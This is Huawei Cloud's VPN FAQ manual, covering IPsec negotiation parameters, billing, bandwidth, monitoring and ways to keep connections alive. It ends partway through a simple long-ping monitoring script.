
Virtual Private Network

FAQ

Issue 01

Date 2021-08-30

HUAWEI TECHNOLOGIES CO., LTD.

Copyright © Huawei Technologies Co., Ltd. 2022. All rights reserved.

No part of this document may be reproduced or transmitted in any form or by any means without prior written consent of Huawei Technologies Co., Ltd.

Trademarks and Permissions

The Huawei logo and other Huawei trademarks are trademarks of Huawei Technologies Co., Ltd. All other trademarks and trade names mentioned in this document are the property of their respective holders.

Notice

The purchased products, services and features are stipulated by the contract made between Huawei and the customer. All or part of the products, services and features described in this document may not be within the purchase scope or the usage scope. Unless otherwise specified in the contract, all statements, information, and recommendations in this document are provided "AS IS" without warranties, guarantees or representations of any kind, either express or implied.

The information in this document is subject to change without notice. Every effort has been made in the preparation of this document to ensure accuracy of the contents, but all statements, information, and recommendations in this document do not constitute a warranty of any kind, express or implied.

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. i

Contents

1 General Questions
1.1 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?
1.2 What Are VPN Negotiation Parameters? What Are Their Default Values?
1.3 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?
1.4 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then Connect Them Through a VPN?
1.5 Can I Visit Websites Across International Borders Using a VPN?
1.6 What Is a VPN Connection? How Do I Set the Number of VPN Connections When Buying a VPN Gateway?
1.7 Will I Be Notified If a VPN Connection Is Interrupted?
1.8 Are a Username and Password Required for Creating an IPsec VPN Connection?
1.9 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSL VPNs?
1.10 Will an IPsec VPN Connection Be Established Automatically?
1.11 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?
1.12 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?
1.13 Which VPN Resources Can Be Monitored?
1.14 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?
1.15 What Is the Actual VPN Connection Network Speed?
1.16 Can a VPN Billed by Traffic Use a Shared Data Package?
1.17 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?
1.18 What Is a Remote Gateway and Remote Subnet in a VPN Connection?
1.19 How Many VPN Connections Do I Need to Connect to Multiple Servers in a Data Center?
1.20 Does a VPN Allow for Communications Between Two VPCs?
1.21 What Are the Impacts of a VPN on an On-premises Network? What Are the Changes to the Route for Accessing an ECS?
1.22 Can I Use a Network with Two Egresses to Establish Two VPN Connections with the Same VPC?
1.23 How Can I Prevent VPN Connection Interruption?
1.24 Why Is Not Connected Displayed as the Status for a Successfully Created VPN?
1.25 What Can I Do If VPN Connection Setup Fails?
1.26 Can an EIP Be Used as a VPN Gateway IP Address?
1.27 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration Is Complete?
1.28 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I Configured ACL Rules on the Gateway Device of the On-premises Data Center?


2 Product Consultation
2.1 What Are the Applicable Scenarios of IPsec VPN?
2.2 What Is a VPC, VPN Gateway, and a VPN Connection?
2.3 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?
2.4 What Is a VPN Connection? How Do I Set the Number of VPN Connections When Buying a VPN Gateway?
2.5 What Is a Remote Gateway and Remote Subnet in a VPN Connection?
2.6 How Do I Plan the CIDR Block of a VPC Accessed over a VPN Connection?
2.7 Will an IPsec VPN Connection Be Established Automatically?
2.8 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?
2.9 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?
2.10 What Are VPN Negotiation Parameters? What Are Their Default Values?
2.11 Are a Username and Password Required for Creating an IPsec VPN Connection?
2.12 How Do I Allow Specific Servers to Access a Subnet on the Cloud Through a Created VPN Connection?
2.13 Which VPN Resources Can Be Monitored?
2.14 Can an EIP Be Used as a VPN Gateway IP Address?
2.15 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?
2.16 Are SSL VPNs Supported?
2.17 How Long Does It Take for Delivered VPN Configurations to Take Effect?
2.18 What Should I Do If I Cannot Create Connections for a VPN Gateway That Has No Bandwidth Information?
2.19 Does HUAWEI CLOUD VPN Support IPv6 Addresses?
2.20 How Do I Determine My VPN Bandwidth Size?
2.21 Does a VPN Connection Support Chinese Encryption Algorithms?
2.22 Which IKE Version Should I Select When I Create a VPN Connection?
2.23 What Are the Bits of the DH Groups Used by HUAWEI CLOUD VPN?
2.24 Can I Visit Websites Across International Borders Using a VPN?
2.25 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then Connect Them Through a VPN?
2.26 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSL VPNs?
2.27 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?
2.28 What Is the Difference Between Billing a VPN Gateway by Bandwidth and by Traffic?
2.29 Can a VPN Billed by Traffic Use a Shared Data Package?
2.30 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?
2.31 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?
2.32 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?
2.33 Will I Be Notified If a VPN Connection Is Interrupted?
2.34 What Can I Do If VPN Connection Setup Fails?
2.35 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?

3 Networking and Application Scenarios
3.1 Can I Visit Websites Across International Borders Using a VPN?


3.2 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then Connect Them Through a VPN?
3.3 How Many VPN Connections Do I Need to Connect to Multiple Servers in a Data Center?
3.4 Do I Need to Install the IPsec Software on Each Server That Needs to Access an ECS to Establish a VPN Connection?
3.5 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSL VPNs?
3.6 Does a VPN Allow for Communications Between Two VPCs?
3.7 What Are the Impacts of a VPN on an On-premises Network? What Are the Changes to the Route for Accessing an ECS?
3.8 What Configurations Are Required on Both Ends of a VPN to Implement the Communication Between a Customer Data Center and a VPC?
3.9 Can I Use a Network with Two Egresses to Establish Two VPN Connections with the Same VPC?
3.10 Can I Connect Two VPCs in the Same Region Through a VPN?
3.11 How Can I Connect Two VPCs in the Same Region?
3.12 How Do I Replace a Direct Connect Connection with a VPN?
3.13 How Do I Enable Communication Among Two VPCs and an IDC Network?
3.14 How Do I Connect Four Subnets?
3.15 Do I Need Two VPN Connections to Connect Four Subnets of Two Regions If Each Region Has Two Subnets?
3.16 Can I Access OBS Through a VPN?
3.17 How Do I Interconnect My Personal Computer with a VPN?
3.18 How Do I Access HUAWEI CLOUD ECSs From Home After My Enterprise Network Is Connected to HUAWEI CLOUD Through a VPN?
3.19 How Do I Create a VPN Connection Temporarily If No Device That Supports IPsec Is Available off the Cloud After I Purchase HUAWEI CLOUD VPN Gateway and Connections?
3.20 How Do I Select a Proper Region on the Cloud When Creating a VPN Gateway?

4 Billing and Payments
4.1 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?
4.2 What Is the Difference Between Billing a VPN Gateway by Bandwidth and by Traffic?
4.3 Can a VPN Billed by Traffic Use a Shared Data Package?
4.4 How Many VPN Connections Will I Be Charged to Connect VPCs in Different Regions?
4.5 When Will VPN Resources Be Frozen? How Can I Unfreeze VPN Resources?

5 Related Operations on the Console
5.1 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?
5.2 How Long Does It Take for Delivered VPN Configurations to Take Effect?
5.3 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration Is Complete?
5.4 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?
5.5 Do I Need to Create a VPN Gateway or a VPN Connection for Creating a VPN? Which Information About a Created VPN Can Be Modified?
5.6 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I Configured ACL Rules on the Gateway Device of the On-premises Data Center?
5.7 What Do I Do If an Exception Occurs When I Add a Remote Subnet During VPN Connection Creation?


5.8 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?
5.9 Can I Perform Operations on HUAWEI CLOUD VPNs Using APIs?
5.10 What Is a Remote Gateway and Remote Subnet in a VPN Connection?
5.11 How Do I Disable the PFS Function When Creating a VPN Connection?
5.12 What Is the Limitation on the Number of Local and Remote Subnets of a VPN? Why Is an Error Message Displayed When I Update the Local Subnet by Specifying a CIDR Block?
5.13 What Are the Precautions for Configuring the Local and Remote Subnets of a VPN Connection?
5.14 Why Is the Status of a VPN Connection Not Connected on the Management Console When It Is Already Available?
5.15 What Do I Do If a Message Is Displayed Indicating That the VPN Connection Does Not Exist After Negotiation Policies Are Modified?
5.16 What Should I Do If I Cannot Create Connections for a VPN Gateway That Has No Bandwidth Information?
5.17 How Do I Reset a VPN Connection?
5.18 What Is the Maximum Bandwidth Supported by a VPN Gateway?
5.19 Which IKE Version Should I Select When I Create a VPN Connection?
5.20 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?
5.21 Are a Username and Password Required for Creating an IPsec VPN Connection?
5.22 Which VPN Resources Can Be Monitored?
5.23 Will I Be Notified If a VPN Connection Is Interrupted?

6 VPN Negotiation and Interconnection
6.1 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?
6.2 What Are VPN Negotiation Parameters? What Are Their Default Values?
6.3 Will an IPsec VPN Connection Be Established Automatically?
6.4 How Do I Configure a VPN for a Device in a Data Center? (Configuring the VPN on a Huawei USG6600 Series Firewall)
6.5 How Should I Configure the Gateway Device of the Customer Data Center When I Use a VPN to Connect to the Cloud?
6.6 Can HUAWEI CLOUD VPN Connect to a Remote Gateway Through a Domain Name?
6.7 How Many Tunnels Does My VPN Connection Have?
6.8 How Do I Allow Specific Servers to Access a Subnet on the Cloud Through a Created VPN Connection?
6.9 Do HUAWEI CLOUD VPNs Have the DPD Mechanism Enabled?
6.10 How Can I Use Security Groups to Prevent ECSs in a VPC From Being Accessed Through a VPN to Implement Security Isolation?
6.11 Will a VPN Connection Be Reestablished After Its Configuration Is Modified?
6.12 Why Can I Not Initiate Negotiation from Amazon Web Services to HUAWEI CLOUD After They Are Interconnected?
6.13 How Do I Configure DPD for Interconnecting with HUAWEI CLOUD?
6.14 What Should I Do If My Firewall Cannot Receive Response Packets of IKE Phase 1 from the HUAWEI CLOUD VPN Gateway?
6.15 What Should I Do If My Firewall Cannot Receive Response Packets from the HUAWEI CLOUD VPN Subnet?
6.16 What Are the Bits of the DH Groups Used by HUAWEI CLOUD VPN?

7 Connection or Ping Failure


7.1 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration Is Complete?
7.2 How Can I Prevent VPN Connection Interruption?
7.3 How Do I Quickly Restore an Interrupted IPsec VPN Connection?
7.4 What Happens If the Bandwidth of a VPN Gateway Exceeds the Size Specified When I Create the Gateway?
7.5 Will an IPsec VPN Connection Be Established Automatically?
7.6 Why Can a Peer ECS Not Be Pinged Even Though the Status of the VPN Connection Created Between the Two Regions Is Normal?
7.7 Why Can Subnets Not Access Each Other When the IDC and the Cloud Are Interconnected and the VPN Connection Is Normal?
7.8 What Do I Do If a VPN Connection In Use Is Interrupted and a Message Is Displayed Indicating That Traffic Is Generated from IP Addresses That Are Not Whitelisted?
7.9 What Do I Do If a VPN Connection Is Interrupted and a Message Is Displayed Indicating That the DPD Times Out?
7.10 Why Is the Status of a VPN Connection Not Connected on the Management Console When It Is Already Available?
7.11 Will I Be Notified If a VPN Connection Is Interrupted?
7.12 What Can I Do If VPN Connection Setup Fails?
7.13 What Should I Do If I Cannot Access the ECSs on the Cloud from My Data Center or LAN Even If the VPN Connection Has Been Set Up?
7.14 Why Is Not Connected Displayed as the Status for a Successfully Created VPN?
7.15 Do HUAWEI CLOUD VPNs Have the DPD Mechanism Enabled?

8 EIPs
8.1 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?
8.2 Can an EIP Be Used as a VPN Gateway IP Address?
8.3 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?
8.4 Why Does an ECS Have EIP Access Information After I Enable a VPN?
8.5 Can the Gateway of a Customer Data Center Have No Fixed Public IP Address?

9 Route Configurations
9.1 What Is a Remote Gateway and Remote Subnet in a VPN Connection?
9.2 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?
9.3 Do I Need to Add a Route to Reach the Customer Data Center Network for an ECS with Multiple NICs?

10 Subnet Setting
10.1 What Are the Precautions for Configuring the Local and Remote Subnets of a VPN Connection?
10.2 What Is the Limitation on the Number of Local and Remote Subnets of a VPN? Why Is an Error Message Displayed When I Update the Local Subnet by Specifying a CIDR Block?
10.3 What Do I Do If an Exception Occurs When I Add a Remote Subnet During VPN Connection Creation?
10.4 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?
10.5 How Do I Plan the CIDR Block of a VPC Accessed over a VPN Connection?
10.6 How Is a VPN Gateway IP Address Allocated?

11 VPN Interesting Traffic


11.1 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I Configured ACL Rules on the Gateway Device of the On-premises Data Center?
11.2 How Do I Configure and Modify the Interesting Traffic of a VPN on the Cloud?

12 Keeping VPN Connection Alive
12.1 How Can I Prevent VPN Connection Interruption?

13 Monitoring
13.1 Which VPN Resources Can Be Monitored?
13.2 Will I Be Notified If a VPN Connection Is Interrupted?
13.3 Can I View the Traffic of Each VPN Connection?
13.4 Will I Be Notified When the VPN Monitoring Result Is Abnormal?

14 Bandwidth and Network Speed
14.1 What Is the Actual VPN Connection Network Speed?
14.2 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?
14.3 How Do I Change the VPN Bandwidth Size?
14.4 What Happens If the Bandwidth of a VPN Gateway Exceeds the Size Specified When I Create the Gateway?
14.5 Why Does the VPN Bandwidth Change Not Take Effect?
14.6 Can a VPN Share Bandwidth with an EIP?
14.7 What Are the Differences Between the Bandwidth of a VPN Connection and That of a Direct Connect Connection?
14.8 How Do I Determine My VPN Bandwidth Size?

15 Quotas
15.1 What Is the VPN Quota?
15.2 How Many VPN Gateways and VPN Connections Can I Create By Default?
15.3 How Do I Change My VPN Gateway and Connection Quotas?
15.4 How Many IPsec VPNs Can I Have?

16 Account Permissions
16.1 Are a Username and Password Required for Creating an IPsec VPN Connection?
16.2 What Should I Do If the System Displays a Message Indicating That I Do Not Have the Permissions to Create a VPN?
16.3 How Do I Determine That My Account Cannot Create a VPN Due to Insufficient Permissions?


1 General Questions

1.1 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?

HUAWEI CLOUD VPN supports the standard IPsec protocol. Devices in your data center can connect to HUAWEI CLOUD if the following requirements are met:

● Devices support IPsec VPN.
● Your data center has a fixed public IP address or an IP address obtained after performing NAT mapping on a fixed public IP address.

Devices are mostly routers and firewalls. For details about the interconnection configuration, see the Administrator Guide.

NOTE

● Common home broadband routers, personal mobile terminals, and VPN services (such as L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.
● Devices that can interconnect with the HUAWEI CLOUD VPN service are usually from the following:
  – Vendors such as Huawei (routers and firewalls), H3C (routers and firewalls), Cisco (routers and firewalls), Ruijie (routers and firewalls), ZTE, Sangfor, Fortinet, 360, Topsec, Hillstone, NetentSec, NSFOCUS, DELL, ZyXEL, and Juniper
  – Cloud service providers such as Alibaba Cloud, Tencent Cloud, and Amazon Web Services
  – Software vendors such as Openswan, strongSwan, and GreenBow
● The IPsec protocol is a standard IETF protocol. Devices that support IPsec can interconnect with HUAWEI CLOUD. Most enterprise-level routers and firewalls support the IPsec protocol.
● However, some devices support IPsec VPN only after you purchase the required software licenses. Contact the data center administrator to confirm the device model with the vendor.


1.2 What Are VPN Negotiation Parameters? What Are Their Default Values?

Table 1-1 VPN negotiation parameters

Policy  Parameter                  Value
------  -------------------------  ------------------------------------------------------------
IKE     Authentication Algorithm   SHA2-256 (default), SHA1, MD5, SHA2-384, and SHA2-512
IKE     Encryption Algorithm       AES-128 (default), AES-192, AES-256, and 3DES
IKE     DH Algorithm               Group 14 (default), Group 1, Group 2, Group 5, Group 15, Group 16, Group 19, Group 20, and Group 21
                                   NOTE: In some regions, only Group 14, Group 2, and Group 5 are available.
IKE     Version                    v2 (default) and v1
IKE     Lifecycle (s)              86400 (default); unit: second; value range: 60 to 604800
IKE     Negotiation Mode           Main (default) and Aggressive. This parameter is mandatory when Version is set to v1.
IPsec   Authentication Algorithm   SHA2-256 (default), SHA1, MD5, SHA2-384, and SHA2-512
IPsec   Encryption Algorithm       AES-128 (default), AES-192, AES-256, and 3DES
IPsec   PFS                        DH group 14 (default), DH group 1, DH group 2, DH group 5, DH group 15, DH group 16, DH group 19, DH group 20, DH group 21, or Disable
                                   NOTE: In some regions, only DH group 14, DH group 2, and DH group 5 are available.
IPsec   Transfer Protocol          ESP (default), AH, and AH-ESP
IPsec   Packet Encapsulation Mode  TUNNEL
IPsec   Lifecycle (s)              3600 (default); unit: second; value range: 480 to 604800

NOTE

● Perfect Forward Secrecy (PFS) is a security feature. IKE negotiation has two phases, phase one and phase two. The key of phase two (IPsec SA) is derived from the key generated in phase one. Once the key in phase one is disclosed, the security of the IPsec VPN may be adversely affected. To improve key security, IKE provides the PFS function. After PFS is turned on, an additional DH exchange is performed during IPsec SA negotiation and a new IPsec SA key is generated, improving IPsec SA security.
● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is also enabled on the gateway in your on-premises data center. Otherwise, the negotiation will fail.
● To enable PFS, ensure that the configurations on both ends of a VPN are the same.
● The traffic-based lifetime of an IPsec SA on the HUAWEI CLOUD VPN defaults to 1,843,200 KB and cannot be changed. This lifetime does not affect the establishment of an IPsec SA.

1.3 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?

1. Log in to the management console.

2. In the upper right corner of the management console, choose Service Tickets > Create Service Ticket.

Figure 1-1 Create Service Ticket

3. Search for VPN and select Virtual Private Network (VPN).


Figure 1-2 Selecting Virtual Private Network (VPN)

4. Select the service ticket type.

Figure 1-3 Selecting the service ticket type

NOTE

When you submit a service ticket, select a ticket type to facilitate problem handling.

Figure 1-4 Ticket category and classification basis


1.4 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then Connect Them Through a VPN?

VPN connects a VPC and an on-premises network.

After the VPN is set up successfully, the VPC and the on-premises network can communicate with each other. The application server then accesses the database just as it would access any other server in the same LAN.

Servers on the cloud and those in the data center can communicate with each other.

NOTICE

● After a VPN is set up, check whether the network latency and packet loss adversely affect service running.
● It is recommended that you run the ping command to check the packet loss and network latency details.

1.5 Can I Visit Websites Across International Borders Using a VPN?

No.

VPN connects a VPC and the network of an on-premises data center, that is, a site-to-site connection.

1.6 What Is a VPN Connection? How Do I Set the Number of VPN Connections When Buying a VPN Gateway?

A HUAWEI CLOUD VPN connection is an IPsec connection established between a VPN gateway on the cloud and an independent public IP address of an on-premises data center. You can configure multiple local subnets (subnets in the VPC) and remote subnets (subnets on the on-premises network) for one connection.

The number of VPN connections to be created is determined by the number of data centers. Each VPN connection can connect a VPC to one data center.

If you choose to buy a yearly/monthly VPN gateway, set the number of VPN connections based on the number of data centers to be connected.


NOTE

For example, if CIDR blocks a1 and a2 on HUAWEI CLOUD need to communicate with CIDR blocks b1 and b2 on the on-premises network, one VPN connection is enough. You only need to set Local Subnet to a1,a2 and Remote Subnet to b1,b2 when creating a VPN connection. The following figure shows an example.

1.7 Will I Be Notified If a VPN Connection Is Interrupted?

The VPN connection status can be monitored. After a VPN connection is created, the VPN service reports the connection status information to Cloud Eye, but does not automatically send alarm notifications to you. To receive notifications, create alarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPN connection and choose Operation > View Metric to view the VPN connection status.


Figure 1-5 View Metric

1.8 Are a Username and Password Required for Creating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication. The key is configured on a VPN gateway. A tunnel is established after VPN negotiation is complete. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords for authentication.

NOTE

IPsec XAUTH is an extension of IPsec VPN. It prompts users to enter their usernames and passwords during VPN negotiation.

HUAWEI CLOUD VPN does not support IPsec XAUTH.

1.9 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSL VPNs?

Scenarios

IPsec VPN connects two LANs, such as a branch and its headquarters, or a local IDC and a VPC.

SSL VPN connects a client to a LAN. For example, the portable computer of an employee on a business trip accesses the internal network of the company.

Connection Modes

IPsec VPN requires fixed gateways, such as firewalls or routers, at both ends. The administrator needs to configure the gateways at both ends to complete IPsec VPN negotiation.

SSL VPN requires specified client software to be installed on the accessing host, which connects to the SSL VPN device using a username and password.


NOTE

HUAWEI CLOUD only supports IPsec VPNs.

1.10 Will an IPsec VPN Connection Be Established Automatically?

After you complete the configurations on both ends of an IPsec VPN connection, the VPN connection is not established automatically; it is established only after data flows between the two ends of the connection. If no data flows between the cloud and the on-premises data center, the VPN connection will always be in the down state. Any data generated by accessing or pinging between servers can trigger the establishment of a VPN connection.

The establishment of a VPN connection can be triggered either through the gateways of the VPN connection or by the traffic between servers on the cloud and in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by a VPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPN connection can be triggered by the data flows between the two ends of the VPN connection. That is, check whether a VPN connection can be established after you ping a server on the cloud from a server in the on-premises data center, and whether a VPN connection can be established after you disconnect the connection and ping a server in the on-premises data center from a server on the cloud.

NOTE

The source and destination addresses of the ping packets must be protected by the VPN.

Before a VPN connection is established, the gateway IP addresses of both ends can be pinged. However, pinging the gateway IP addresses does not trigger the establishment of the VPN connection.

1.11 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?

VPNs are billed on a yearly/monthly or pay-per-use basis. You need to pay for both the VPN gateway bandwidth or traffic price and the VPN connection price.

VPN gateways can be billed by traffic or bandwidth.


1. A yearly/monthly VPN gateway can only be billed by bandwidth. The price of a yearly/monthly VPN gateway includes the price of the VPN connections that can be created for the gateway and the bandwidth price.

2. The billing cycle of the pay-per-use billing mode is one hour. If you choose a pay-per-use VPN gateway, a VPN connection must be purchased together with the VPN gateway. The price includes the VPN gateway bandwidth or traffic price and the price of the VPN connection created together with the gateway. If you create another connection for the gateway, you will be charged for the additional connection.

NOTE

● The IP address of the VPN gateway will not be billed.
● A VPN gateway cannot share a bandwidth with an EIP bound to an ECS.

1.12 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway is deleted.

Deleting a VPN gateway will also delete the resources associated with the gateway.

NOTICE

Deleting the last connection of a pay-per-use VPN gateway will also delete the gateway. If you want to retain the IP address, do not delete the last VPN connection.

1.13 Which VPN Resources Can Be Monitored?

VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inbound bandwidth, outbound traffic, outbound bandwidth, and outbound bandwidth usage.

To view VPN gateway metrics, locate the target VPN gateway and click View Metric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is not connected.

To view the VPN connection status, locate the target VPN connection and click View Metric in the Operation column.


1.14 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?

Your purchased VPN gateway bandwidth is used in the outbound direction. To balance the traffic in the inbound and outbound directions, the bandwidth in the inbound direction is limited.

● If the purchased bandwidth is less than or equal to 10 Mbit/s, the bandwidth in the inbound direction is limited to 10 Mbit/s.
● If the purchased bandwidth is more than 10 Mbit/s, the bandwidth in the inbound direction is the same as the purchased bandwidth.

The unit of bandwidth is Mbit/s and that of traffic is GB.

1.15 What Is the Actual VPN Connection Network Speed?

Test setup: a VPN connection has been created, and two ECSs have been created, one at the local side and the other at the remote side. The two ECSs can ping each other.

Perform the following steps to test the VPN gateway network speed if the bandwidth of your VPN gateway is 200 Mbit/s:

1. If the ECSs at the two sides of the VPN run Windows, use iPerf3 and FileZilla (a free FTP application for file uploading and downloading) to test the network speed.

NOTE

The test shows that the average VPN network speed is 180 Mbit/s, a deviation of about 10%. The TCP and FTP protocols have congestion control mechanisms, and the IPsec protocol adds a new IP header. Therefore, a network speed deviation of about 10% is normal for the VPN network.

Figure 1-6 shows the result of the test performed using the iPerf3 client.

Figure 1-6 Test result for 200 Mbit/s bandwidth (iPerf3 client)


Figure 1-7 shows the result of the test performed using the iPerf3 server.

Figure 1-7 Test result for 200 Mbit/s bandwidth (iPerf3 server)

2. If the ECSs at the two sides of the VPN run CentOS 7, use iPerf3 to test the network speed. The network speed can reach 180 Mbit/s.

3. If the ECS functioning as the server runs CentOS 7 and the ECS functioning as the client runs Windows, use iPerf3 and FileZilla to test the network speed. The network speed is about 20 Mbit/s. The reason is that the TCP implementations on Windows and on Linux differ, which causes the slow network speed. Therefore, if the ECSs at the two sides of the VPN use different OSs, the VPN network speed does not meet the bandwidth requirements. Figure 1-8 shows the result of the test performed using iPerf3.

Figure 1-8 Test result when ECSs at the two sides run different OSs (iPerf3)

Perform the following steps to test the VPN gateway network speed if the bandwidth of your VPN gateway is 1,000 Mbit/s:

The VPN gateway bandwidth is shared by all of its VPN connections. If the bandwidth size is large, multiple ECSs are required to test the VPN gateway bandwidth because the forwarding performance of each ECS is limited. This scenario has high requirements on ECS specifications. The ECSs used for testing must have NICs that support a bandwidth of 2 Gbit/s or higher.


The tests show that the actual VPN connection network speed on HUAWEI CLOUD is within the normal range. However, the servers used at both sides of the VPN connection must run OSs of the same type, and the server NICs must meet the configuration requirements.

1.16 Can a VPN Billed by Traffic Use a Shared Data Package?

No.

The VPN service is billed independently and cannot use the shared data package.

1.17 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?

● A VPC is a private network on the cloud. Multiple VPCs can be created in the same region but are isolated from each other. A VPC can be divided into multiple subnets.
● A VPN gateway is created based on a VPC and is the access point of a VPN connection. Only one VPN gateway can be purchased for each VPC, but multiple VPN connections can be created for each gateway.
● A VPN connection is created based on a VPN gateway and is used to connect a VPC to an on-premises data center (or a VPC in another region). That is, each VPN connection connects to a gateway of an on-premises data center.

NOTE

The number of VPN connections is irrelevant to the number of local subnets and remote subnets. It is only related to the number of data centers (or VPCs in other regions) connected to your VPC. The created VPN connections are displayed in the VPN connection list. You can also view the number of VPN connections created for each VPN gateway.

1.18 What Is a Remote Gateway and Remote Subnet in a VPN Connection?

When creating a VPN connection, a subnet in the HUAWEI CLOUD VPC is the local subnet and the created VPN gateway is the local gateway. The connected subnet in the on-premises data center is the remote subnet and the gateway in the on-premises data center is the remote gateway.

A remote gateway IP address is a public network IP address. A remote subnet is a subnet of the on-premises data center that needs to connect to a HUAWEI CLOUD VPC through a VPN.


1.19 How Many VPN Connections Do I Need to Connect to Multiple Servers in a Data Center?

HUAWEI CLOUD IPsec VPN connects a VPC on the cloud and subnets in your on-premises data center. Therefore, the number of VPN connections is irrelevant to the number of servers, but is related to the number of data centers where the servers are located.

In most cases, an on-premises data center has a public network gateway. All servers connect to the Internet through this gateway. Therefore, you only need to configure one VPN connection to allow communication between the HUAWEI CLOUD VPC and your network.

1.20 Does a VPN Allow for Communications Between Two VPCs?

● If the two VPCs are deployed in the same region, use a VPC peering connection to connect them.
● If the two VPCs are deployed in different regions, use a VPN connection to connect them. The detailed operations are as follows:
  a. Create a VPN gateway for each VPC and create VPN connections for the two VPN gateways.
  b. Set the remote gateway address of each VPN connection to the gateway IP address of the peer side.
  c. Set the remote subnet of each VPN connection to the CIDR block of the peer VPC.
  d. The pre-shared keys and algorithm parameters of the two VPN connections must be the same.

1.21 What Are the Impacts of a VPN on an On-premises Network? What Are the Changes to the Route for Accessing an ECS?

When you configure a VPN, configure the following on the gateway of the on-premises data center:

1. Configure IKE/IPsec policies.
2. Specify interesting traffic (ACL rules).
3. Check the route of the gateway in the on-premises data center to ensure that traffic destined for the HUAWEI CLOUD VPC is routed to the correct egress interface (the interface with the IPsec policy bound).

After the VPN configuration is complete, only the traffic matching the ACL rules enters the VPN tunnel.


For example, before a VPN is created, on-premises users access the ECS through the EIP bound to the ECS. After the VPN is created, data flows matching the ACL rules access the private IP address of the ECS through the VPN tunnel.

1.22 Can I Use a Network with Two Egresses to Establish Two VPN Connections with the Same VPC?

No.

When creating a VPN, a local subnet is a VPC subnet, and a remote subnet is the subnet of an on-premises data center. If the two connections use the same local subnet and remote subnet, the VPN connections will fail.

1.23 How Can I Prevent VPN Connection Interruption?

VPN connections may be renegotiated when the IPsec SA lifecycle is about to expire or the data transferred through the VPN connection exceeds 20 GB. Usually, renegotiation does not interrupt VPN connections.

Most disconnections are caused by incorrect configurations on either end of the VPN connection, or by renegotiation failing due to Internet exceptions.

The common causes of connection interruptions are as follows:

● ACLs of the devices at the two ends of the VPN connection do not match.
● SA lifecycles at the two ends of the VPN connection do not match.
● DPD is not configured in the data center.
● Configuration is modified while the VPN is in use.
● Packets are fragmented because the data size exceeds the MTU.
● Jitter occurs on the carrier's network.

Therefore, ensure the following configurations to keep the VPN connection alive:

● Local and remote subnets are matched pairs.
● SA lifecycles at the two ends of the VPN connection are consistent.
● DPD is enabled on the gateway device of the data center, and the number of detection times is greater than or equal to 5.
● Parameters at both ends of the VPN connection are not modified while the connection is in use.
● Set TCP MAX-MSS to 1300 for the gateway device in the data center.
● The bandwidth of the gateway in the data center is large enough to be used by the VPN.
● VPN connection negotiation can be triggered by the two ends, and the active negotiation configuration of the gateway in the data center has been enabled.

● Run a long ping on the subnets at both ends. The script content is as follows:

    #!/bin/sh
    # Long-ping script: every 5 seconds, record whether HOST answers an ICMP echo.
    host=$1
    if [ -z "$host" ]; then
        echo "Usage: $(basename "$0") [HOST]"
        exit 1
    fi
    log_name="$host.log"
    while :; do
        # One probe with a 1-second timeout; grep fails when no reply arrived.
